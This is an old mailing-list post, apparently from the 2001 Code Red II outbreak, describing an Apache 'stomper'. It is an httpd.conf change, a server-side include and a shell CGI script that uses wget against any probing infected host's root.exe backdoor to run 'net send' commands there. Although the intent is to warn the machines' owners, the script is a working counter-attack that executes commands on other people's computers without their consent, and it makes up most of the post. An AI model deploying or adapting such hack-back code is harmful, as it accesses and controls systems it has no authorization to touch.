Code Red - how to help.

[Jack Snodgrass]

Not sure how effective this is or not.

If you have a linux box running apache, you can setup the following:

in your httpd.conf file add:
AddHandler server-parsed .ida
AddType text/html .ida

then create a default.ida file in your document root directory that
contains:
<!--#exec cgi="/cgi-bin/codered_stomper" -->

make sure that you have "includes" turned on for the document root
directory.

restart apache.

If you access http://yourbox/default.ida you should get an error
since you have created /cgi-bin/codered_stomper yet.

Once all that works, create a /cgi-bin/codered_stomper file that
has:
#!/bin/sh
echo Content-type: text/plain
echo
/usr/bin/wget -T 60 -o /dev/null
"http://$REMOTE_ADDR/scripts/root.exe?/c+net+send+%2A+Machine+%25COMPUTERNAM
E%25+has+been+infected+by+the+Code+Red+II+worm+and+attacked+my+server"
/usr/bin/wget -T 60 -o /dev/null
http://$REMOTE_ADDR/scripts/root.exe?/c+net+send+%2A+Please+see+http://www.c
ert.org/advisories/CA-2001-23.html+and+fix+this+server+ASAP.

you'll need wget installed.

When a Code Red box tries to deliver it's payload, you'll connect back to
their
web server and use the code red backdoor to sent a local system message.
Maybe
if someone gets this, they'll fix their stupid box.

I got the idea from someone on the net... I added a few changes to make it
work
on my systems.

I don't think that it would be a good idea to start erasing or destorying
files.

A simple 'hey stupid' message will hopefully sufice.

jack